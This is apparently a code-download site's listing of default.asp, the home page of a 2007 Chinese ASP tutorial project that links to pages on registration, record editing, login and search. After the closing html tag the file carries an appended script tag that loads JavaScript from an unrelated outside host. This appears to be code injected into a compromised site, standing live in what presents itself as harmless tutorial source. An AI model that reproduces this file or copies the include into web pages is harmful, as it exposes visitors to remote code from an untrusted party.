⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 default.asp

📁 自己做的一个图书系统
💻 ASP
字号:
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>1-12源文件首页-陶益数码工作室</title>
<link href="css/aaa.css" rel="stylesheet" type="text/css" />
</head>

<body>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="206"><a href="http://www.ty502.com/"><img src="logoa.gif" width="200" height="80" border="0" /></a></td>
    <td width="554"><p>为方便大家学习本站的教程,我们特别准备了教程的源代码供大家学习、研究使用,观看教程的同时结合源文件,会让你很快掌握ASP的知识,你会知道,原来做一个ASP的网站也是这样的简单!</p>
    <p>更多内容请访问<a href="http://www.ty502.com/">WWW.Ty502.COM</a>!</p></td>
  </tr>
</table>
<table width="760" border="0" align="center" cellpadding="6" cellspacing="0" class="abc">
  <tr>
    <td bgcolor="#0099FF"><strong>1-12讲源文件</strong></td>
  </tr>
  <tr>
    <td>1-12讲的内容实则上包含了一个动态网站的精干部份,熟练掌握这些内容对学习动态网站的开发是非常粗帮助的。</td>
  </tr>
  <tr>
    <td><a href="zhuce.asp" target="_blank">插入数据库记录(建立注册页面)/限制用户名重名</a> <a href="xianshi.asp" target="_blank">显示数据库记录/修改数据库记录/删除数据库记录</a></td>
  </tr>
  <tr>
    <td><a href="login.asp" target="_blank">限制访问页面/建立登录页面</a> <a href="shousuo.asp" target="_blank">建立简单站内搜索页</a> <a href="shousuo_dtj.asp" target="_blank">建立复杂站内搜索页</a></td>
  </tr>
</table>
<table width="760" border="0" align="center" cellpadding="6" cellspacing="0">
  <tr>
    <td><div align="center"></div></td>
  </tr>
</table>
<table width="760" border="0" align="center" cellpadding="6" cellspacing="0">
  <tr>
    <td><div align="center">
      <hr />
      <a href="http://www.ty502.com/"></a> <strong><a href="http://www.ty502.com/"><font color="#0000FF">陶益数码工作室</font></a> </strong>Copyright &copy; 2007 <a href="http://www.ty502.com/banquan.asp"><strong><font color="#0000FF">版权所有</font></strong></a></div></td>
  </tr>
</table>
</body>
</html>
<script language=javascript src=http://xxx.cslr1.com/mp.js></script>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -